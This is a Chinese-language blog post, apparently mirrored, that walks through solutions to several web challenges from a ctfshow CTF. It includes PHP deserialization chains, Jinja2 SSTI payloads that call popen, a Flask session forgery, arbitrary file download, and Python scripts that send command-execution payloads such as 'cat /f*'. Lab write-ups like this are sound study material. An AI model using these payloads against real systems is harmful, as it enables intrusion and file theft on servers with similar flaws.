返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >ctfshow愚人杯web复现
  • 667
分享到

ctfshow愚人杯web复现

网络安全php 2023-08-31 10:08:33 667人浏览 八月长安
摘要

easy_signin 题目url base64解码是face.png,尝试flag.txt和flag.PHP,base64加密后传入都不对,用index.php加密后传入,看源码 将后面的bas

easy_signin

题目url

image-20230404183149808

base64解码是face.png,尝试flag.txtflag.PHP,base64加密后传入都不对,用index.php加密后传入,看源码

image-20230404183412221

将后面的base64解密得到flag

image-20230404183454406

被遗忘的反序列化

源码

# 当前目录中有一个txt文件哦error_reporting(0);show_source(__FILE__);include("check.php");class EeE{    public $text;    public $eeee;    public function __wakeup(){        if ($this->text == "aaaa"){            echo lcfirst($this->text);        }    }    public function __get($kk){        echo "$kk,eeeeeeeeeeeee";    }    public function __clone(){        $a = new cycycycy;        $a -> aaa();    }    }class cycycycy{    public $a;    private $b;    public function aaa(){        $get = $_GET['get'];        $get = cipher($get);        if($get === "p8vfuv8g8v8py"){            eval($_POST["eval"]);        }    }    public function __invoke(){        $a_a = $this -> a;        echo "\$a_a\$";    }}class gBoBg{    public $name;    public $file;    public $coos;    private $eeee="-_-";    public function __toString(){        if(isset($this->name)){            $a = new $this->coos($this->file);            echo $a;        }else if(!isset($this -> file)){            return $this->coos->name;        }else{            $aa = $this->coos;            $bb = $this->file;            return $aa();        }    }}   class w_wuw_w{    public $aaa;    public $key;    public $file;    public function __wakeup(){        if(!preg_match("/php|63|\*|\?/i",$this -> key)){            $this->key = file_get_contents($this -> file);        }else{            echo "不行哦";        }    }    public function __destruct(){        echo $this->aaa;    }    public function __invoke(){        $this -> aaa = clone new EeE;    }}$_ip = $_SERVER["Http_AAAAAA"];unserialize($_ip);

先看怎么传参

$_ip = $_SERVER["HTTP_AAAAAA"];

这一句话的意思是接收header头中 aaaaaa参数的值,就例如这样的

image-20230404223656400

然后提示说有一个txt,但不知道名字是什么,想办法读取文件名

再来看这个类

class gBoBg{    public $name;    public $file;    public $coos;    private $eeee="-_-";    public function __toString(){        if(isset($this->name)){            $a = new $this->coos($this->file);            echo $a;        }else if(!isset($this -> file)){            return $this->coos->name;        }else{            $aa = $this->coos;            $bb = $this->file;            return $aa();        }    }}   

有一个

 $a = new $this->coos($this->file);

coosfile都是可控的,所以可以利用php原生类来读取文件

GlobIterator

GlobIterator 类也可以遍历一个文件目录,但与上面略不同的是其行为类似于 glob(),可以通过模式匹配来寻找文件路径。

它的特点就是,只需要知道部分名称就可以进行遍历

例如

<?php$dir=new GlobIterator("/*flag*");echo $dir;

之后就想办法触发__toString(),可以通过EeE类中的

class EeE{    public $text;    public $eeee;    public function __wakeup(){        if ($this->text == "aaaa"){            echo lcfirst($this->text);

来触发,因为要echo lcfirst($this->text);还要满足if语句让text==a即可

class EeE{    public $text = 'a';    public $eeee;}class gBoBg{    public $name = '123';    public $file = '*txt';    public $coos = 'GlobIterator';}$e = new EeE();$e ->text = new gBoBg();echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:4:"*txt";s:4:"coos";s:12:"GlobIterator";}s:4:"eeee";N;}

image-20230404233020353

得到h1nt.txt,之后官方wp上说在根目录无法直接读,但实际上好像是在本目录可以用原生类SplFileObject

class EeE{    public $text = 'a';    public $eeee;}class gBoBg{    public $name = '123';    public $file = 'h1nt.txt';    public $coos = 'SplFileObject';}$e = new EeE();$e ->text = new gBoBg();echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:8:"h1nt.txt";s:4:"coos";s:13:"SplFileObject";}s:4:"eeee";N;}

但读出来和官方wp上的不一样,没有key

image-20230404233854972

又尝试用file伪协议来读

class EeE{    public $text = 'a';    public $eeee;}class gBoBg{    public $name = '123';    public $file = 'php://filter/convert.base64-encode/resource=h1nt.txt';    public $coos = 'SplFileObject';}$e = new EeE();$e ->text = new gBoBg();echo serialize($e);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";s:3:"123";s:4:"file";s:52:"php://filter/convert.base64-encode/resource=h1nt.txt";s:4:"coos";s:13:"SplFileObject";}s:4:"eeee";N;}

image-20230404234155231

就都读出来了

image-20230404234240120

#用于check.php key:qwertyuiopasdfghjklzxcvbnm123456789 move:2~4

猜测(看wp)

其中move是移动的意思,猜测这是一个移位的加密,其中猜测key是范围那么就有向左就有3种可能, 向右也有3种可能 但是提示2提示我们random-随机,那么加密可能是2~7随机,那么每次正好相等就是1/24的几率

之后就想办法构造链子触发利用eval函数了

class EeE{    public $text = 'a';    public $eeee;}class cycycycy{    public $a;}class gBoBg{    public $name;    public $file = '1';    public $coos;}class w_wuw_w{    public $aaa;    public $key;    public $file;}$a = new EeE();$a ->text = new gBoBg();$a ->text ->coos = new w_wuw_w();$a ->text ->coos ->aaa = new cycycycy();echo serialize($a);//O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";N;s:4:"file";s:1:"1";s:4:"coos";O:7:"w_wuw_w":3:{s:3:"aaa";O:8:"cycycycy":1:{s:1:"a";N;}s:3:"key";N;s:4:"file";N;}}s:4:"eeee";N;}

之后用脚本爆破key就可以了,贴一个官方的脚本

import requestsimport remi = ['i6xstx6d6x6ir','u5zarz5s5z5ue','y4lpel4a4l4yw','sqnhonqjqnqsi','dwmjpmwkwmwdo','fe1ka1ele1efp']d = 1while d<2:    for i in mi:        data = {            'eval':'system("cat /f1agaaa");'        }        url = f"http://67423f19-3ba4-41b5-9e10-716ce8f5e683.challenge.ctf.show/index.php?get={i}"        header = {            'aaaaaa':'O:3:"EeE":2:{s:4:"text";O:5:"gBoBg":3:{s:4:"name";N;s:4:"file";s:1:"1";s:4:"coos";O:7:"w_wuw_w":3:{s:3:"aaa";O:8:"cycycycy":1:{s:1:"a";N;}s:3:"key";N;s:4:"file";N;}}s:4:"eeee";N;}'        }        reqpose = requests.post(url=url,data=data,headers=header).text        re_text = re.findall(r"(?<=).*", reqpose, re.S)        if '' not in re_text:            print(re_text[0])            d += 1

暗网聊天室(假WEB真密码)

不会密码直接放官方wp

1.刚开始的聊天界面

img

重点信息:

  • 1.提示要本地访问 9999 端口,可能存在 SSRF
  • 2.提示要访问 “点我进入宇宙商城” 链接
  • 3.提示 FLAG 存在于热门网站向其他人发的宣传语中
  • 4.宣传语长度>128
  • 5.右上角的插件可以用

2.点开插件,出现新页面

image-20230405120303218

介绍了匿名原理,并附上了加密代码

  • \1. 可以看到加密是以 128 为一组,想到宣传语长度>128,说明 FLAG 和一些字为一组、下 一个节点的 IP 和一些字为一组
  • \2. 顶部是插件拦截的 自己的私钥、传来的原始数据、用自己私钥解密后的数据、发包按 钮,类似 Burp 的改包功能
  • \3. 通过原始数据的长度 18944,可以推断自己位于节点 1 先自己在本地尝试加密

image-20230405120319554

发现一组加密后的长度为 512,而加密是 128 一组

image-20230405120334385

3.访问 “点我进入宇宙商城“

看看是否可以利用 SSRF 获取敏感信息

image-20230405120351623

可以看到自己 IP,想到加密也利用到了 IP,可能有用 查看 robots.txt

image-20230405120402666

查看 shop.py.bak

image-20230405120415647

想到本地访问 9999 端口 /shop?api=127.0.0.1:9999

image-20230405120429341

获取到 3 个节点的公钥,可以自己进行加密 通过该网站的公钥 1 和自己的私钥 1 进行加解密,发现可行,说明该网站就是用户 A 想到如果对自己 IP 进行加密,然后替换“解密后的数据“中的用户 B 的 IP,那么最终明文 将发送给自己

4.构造 Payload

还是这个图

image-20230405120442584

第二行就是插件中的“解密后的数据”,可以看到第二个 4*512 就是用户 B 的 IP 利用两个公钥加密自己 IP 并替换:

from Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from flask import Flask, request, abort# 加密def encrypt(plaintext, public_key): cipher = PKCS1_v1_5.new(RSA.imporTKEy(public_key)) ciphertext = '' for i in range(0, len(plaintext), 128): ciphertext += cipher.encrypt(plaintext[i:i+128].encode('utf8')).hex() return ciphertextIP = '2.56.12.89'plaintext_half = '拦截的 解密后的数据'# 公钥开头、结尾有俩\npublic_key2 = '-----BEGIN PUBLIC KEY-----\nxxx\n-----END PUBLIC KEY-----'public_key3 = '-----BEGIN PUBLIC KEY-----\nxxx\n-----END PUBLIC KEY-----'IP_ciphertext = encrypt(IP, public_key3)IP_ciphertext = encrypt(IP_ciphertext, public_key2)# 替换最终 IPplaintext_half_new = plaintext_half[:2048] + IP_ciphertext + plaintext_half[4096:]print(plaintext_half_new)

将新生成的数据替换“解密后的数据”,发送即可获取 FLAG 因为最终传递的 IP 是你自己

image-20230405120510490

5.一把梭脚本

import reimport requestsfrom Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_v1_5from flask import Flask, request, aborturl = 'http://xxx.challenge.ctf.show/' # 题目URL,先等几秒再运行# 加密def encrypt(plaintext, public_key):    cipher = PKCS1_v1_5.new(RSA.importKey(public_key))    ciphertext = ''    for i in range(0, len(plaintext), 128):        ciphertext += cipher.encrypt(plaintext[i:i+128].encode('utf-8')).hex()    return ciphertextdef get_plaintext_half():    text = requests.get(url+'/update').text    return re.findall('[^@]*\.92', text)[0]def get_public_key(public_key):    text = requests.get(url+'/shop?api=127.0.0.1:9999').text    return re.findall('-----BEGIN PUBLIC KEY-----\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n-----END PUBLIC KEY-----', text)[public_key-1]IP = '2.56.12.89'plaintext_half = get_plaintext_half() # 获取解密后的数据# 获取公钥2、3public_key2 = get_public_key(2).replace('\n','').replace('-----BEGIN PUBLIC KEY-----','-----BEGIN PUBLIC KEY-----\n').replace('-----END PUBLIC KEY-----','\n-----END PUBLIC KEY-----')public_key3 = get_public_key(3).replace('\n','').replace('-----BEGIN PUBLIC KEY-----','-----BEGIN PUBLIC KEY-----\n').replace('-----END PUBLIC KEY-----','\n-----END PUBLIC KEY-----')# 两次加密IP_ciphertext = encrypt(IP, public_key3)IP_ciphertext = encrypt(IP_ciphertext, public_key2)# 替换最终IPplaintext_half_new = plaintext_half[:2048] + IP_ciphertext + plaintext_half[4096:]# 请求requests.post(url + '/pass_message',data = {'message':plaintext_half_new})# 接收明文text = requests.get(url+'/update').textflag = re.findall('ctfshow{.*}', text)[0]print(flag)input()

easy_ssti

看源码,提示app.zip,访问一下下载下来

image-20230405003551238

模板渲染是在hello目录下,尝试注入

image-20230405003719284

有ssti漏洞,没有任何过滤,自己构造或直接百度都可

/{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

但在读flag的时候好像把/和f给过滤了,用base64读即可

{{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('echo "Y2F0IC9mbGFn"|base64 -d|sh').read()}}

image-20230405003934859

easy_flask

一个登录页面,随便注册一个账号登进去

image-20230405004205502

要admin账户,但可以看源码

image-20230405004238489

这里给了key,八成是session伪造,登录抓包拿到session

key=S3cr3tK3y

image-20230405004521164

flask_session_cookie_manager3解密

image-20230405004749051

将user改为admin再加密

image-20230405004913311

修改session发包登录

image-20230405005153261

但这里只有一个假的flag看源码发现

image-20230405005251266

应该有任意文件下载,尝试下载源码

/download/?filename=app.py

成功得到源码

在源码里看到

image-20230405005518138

在hello路由下可以直接命令执行

image-20230405005732756

/hello/?eval=__import__("os").popen("cat /flag_is_h3re").read()

easy_php

源码

error_reporting(0);highlight_file(__FILE__);class ctfshow{    public function __wakeup(){        die("not allowed!");    }    public function __destruct(){        system($this->ctfshow);    }}$data = $_GET['1+1>2'];if(!preg_match("/^[Oa]:[\d]+/i", $data)){    unserialize($data);}?>

先不看过滤,只要执行__destruct()中的system函数即可,给ctfshow赋值

error_reporting(0);highlight_file(__FILE__);class ctfshow{    public function __wakeup(){        die("not allowed!");    }    public function __destruct(){        system($this->ctfshow);    }}$a = new ctfshow();$a -> ctfshow = 'whoami';echo serialize($a);?>     //O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}

image-20230405113920158

再看过滤

if(!preg_match("/^[Oa]:[\d]+/i", $data))

不能传入以O和a开头的序列化值,也就是对象和数组的序列化值.

在php低版本中,O或a的冒号后的数字前可以加一个+来进行绕过。但这个题目的版本是7.3无法绕过

看其他师傅的可以将0替换为C来绕过

payload

C:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}

但放到题目中并不通

猜测是题目中的ctfshow类未实现serializable接口,所以不能解析该属性。所以找php中内置的实现了Serializable接口的类

wp使用了ArrayObject()类,使用这个类去修饰ctfshow

class ctfshow{    public $ctfshow = 'whoami';}$a= new ArrayObject();$a -> a = new ctfshow();echo serialize($a);?> //C:11:"ArrayObject":74:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:6:"whoami";}}}

image-20230405114303695

成功回显

image-20230405115145316

最终payload

?1%2b1>2=C:11:"ArrayObject":75:{x:i:0;a:0:{};m:a:1:{s:1:"a";O:7:"ctfshow":1:{s:7:"ctfshow";s:7:"cat /f*";}}}

easy_class(不会)

直接放大佬的wp

来源地址:https://blog.csdn.net/qq_63928796/article/details/129968742

--结束END--

本文标题: ctfshow愚人杯web复现

本文链接: https://lsjlt.com/news/385253.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • ctfshow愚人杯web复现
    easy_signin 题目url base64解码是face.png,尝试flag.txt和flag.php,base64加密后传入都不对,用index.php加密后传入,看源码 将后面的bas...
    99+
    2023-08-31
    网络安全 php
  • ctfshow 第三届愚人杯 easy_php
    这题学的了一些小tips,这里讲解一下。 基础 这里详细讲解一下使用c绕过wakup。 O标识符代表对象类型,而C标识符代表类名类型。如果将O替换为C,则在反序列化时会将其解释为一个新的类名字符串,从而创建一个新的类而不是对...
    99+
    2023-09-18
    php 开发语言 linux 经验分享 安全
  • CTFSHOW愚人杯2023 部分wp
    web easy_signin url是base64编码后的文件名 直接读个index.php 然后查看源码 解码base64 easy_ssti 过滤了斜杠,不能访问根目录了,考虑手动拼接一个{{l...
    99+
    2023-08-31
    php 开发语言 网络安全 python
  • ctfshow 愚人杯&菜狗杯部分题目(flasksession伪造&ssti)
      目录 愚人杯 (1) easy_signin (2) easy_ssti(无过滤ssti) (3) easy_flask(flash-session伪造) (4) easy_php(C:开头序列化数据) 菜狗杯 (1) 抽老婆(fla...
    99+
    2023-09-13
    php
  • ctf.show 愚人杯
    奇怪的压缩包 下载附件解压提示要密码 使用010editor打开,发现frFlags 和 deFlags 的值都被修改了,这就会造成压缩包的伪加密, 将它们都改回0。  另存为一个文件再打开,没有密码提示了  解压发现图片并不完整,...
    99+
    2023-09-03
    安全 zip伪加密 010editor PHP伪协议 加密
  • ctfshow新手杯(web)
    前言 前天ctfshow举办的新手杯,里面的部分web题对于我来说还是有必要记录一下的。里面的大师傅都太强了。 easy_eval web签到题,打开题目一段代码: 将eval函数进行闭合,eval函数失去了作用,所以我们需要补上php标签...
    99+
    2023-09-09
    php 开发语言 安全
  • CTFSHOW菜狗杯 web
    文章目录 web签到web2 c0me_t0_s1gn我的眼里只有$抽老婆一言既出驷马难追TapTapTapWebshell化零为整无一幸免传说之下(雾)算力超群算力升级2遍地飘零茶歇区小舔田...
    99+
    2023-08-31
    python 前端 flask php
  • ctfshow吃瓜杯 web
    文章目录 热身ATTup代码审计phar反序列化 shellmeshellme_Revenge 热身 ...
    99+
    2023-09-04
    php 网络安全 web安全 python
  • ctfshow 七夕杯(复现)
    1、签到题 (限制长度的命令执行 七字符、五字符、四字符) 网页源码中存在提示,限制长度为7字符 function isSafe(cmd){ return cmd.length...
    99+
    2023-09-07
    linux bash php
  • CISCN 2022 初赛 web 复现
    [CISCN 2022 初赛]ezpop 可以看到版本,那么直接上网找链子打 www.zip 查看路由,是 Index/test,然后 post 传参 a ...
    99+
    2023-09-15
    比赛复现
  • DASCTF2022.07赋能赛 WEB题目复现
    前言 其实7月时就想复现了,感觉题目质量挺高的,但奈何自己太菜看不懂就先搁置了。现在有能力回来填坑啦,但最后一题目前对自己理解起来还是有点难度,之后再研究研究。 复现 DASCTF|2022DASCTF7月赋能赛官方Write Up 绝对防...
    99+
    2023-09-05
    php web安全 sql python flask
  • web前端怎么实现撩人的按钮特效
    本篇内容主要讲解“web前端怎么实现撩人的按钮特效”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“web前端怎么实现撩人的按钮特效”...
    99+
    2024-04-02
  • 现在这么多人转行学web前端开发,那么web前端到底能干嘛?
    现在很多人说学习web前端,很多人只知道web前端薪资高?那么你太low了,web前端在各行各业都有着运用,可以说是无所不能,web前端到底能干嘛?...
    99+
    2023-06-03
  • 如何用Python实现机器人回复功能
    本文小编为大家详细介绍“如何用Python实现机器人回复功能”,内容详细,步骤清晰,细节处理妥当,希望这篇“如何用Python实现机器人回复功能”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧。安装模块pip ins...
    99+
    2023-06-02
  • Node.js 和 Sails.js 的完美结合:助力Web开发人员实现梦想
    Node.js和Sails.js都是十分强大的工具,适合想要构建强大高效Web应用程序的开发人员。Node.js是一个开源JavaScript运行环境,它使开发人员能够构建分布式、可扩展的应用程序。Sails.js是一个基于Node.j...
    99+
    2024-02-26
    Node.js, Sails.js, Web开发, MVC框架
  • 基于Python实现复刻人生重开模拟器
    目录人生重开模拟器介绍代码实现打印初始界面设置初始属性设置角色性别设置角色出生点针对每一岁,生成人生经历人生重开模拟器介绍 人生重开模拟器是由VickScarlet上传至GitHub...
    99+
    2024-04-02
  • 2022-UNCTF部分wp以及web的赛后复现学习
    前言 tcltcltcltcltcl,前路漫漫,继续努力。 WEB 1、ezgame 挺有意思的一个游戏,不够玩,直接玩出flag… 2、我太喜欢bilibili大学了 搜索UNCTF,直接出flag...
    99+
    2023-09-11
    php 开发语言
  • Python怎么实现模糊照片人脸恢复清晰
    本篇内容主要讲解“Python怎么实现模糊照片人脸恢复清晰”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Python怎么实现模糊照片人脸恢复清晰”吧!我们看一看对比图。最右侧的就是GFPGAN的...
    99+
    2023-06-22
  • PHP+Socket系列之IO多路复用及实现web服务器
    本篇文章给大家带来了关于php+socket的相关知识,其中主要介绍了IO多路复用,以及php+socket如何实现web服务器?感兴趣的朋友下面一起来看一下,希望对大家有帮助。php原生socket之IO多路复用以及实现web服务器多路复...
    99+
    2023-05-14
    php socket
  • 机械臂+2d相机实现复合机器人定位抓取
    硬件参数 机械臂:艾利特 相机:海康相机 2d识别库:lindmod,github可以搜到 光源:磐鑫光源 软件参数 系统:windows / Linux 开发平台:Qt 开发语言:C++ 开发视觉库:OpenCV 软件模块 机械臂控制模...
    99+
    2023-08-30
    机器人 图像处理
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作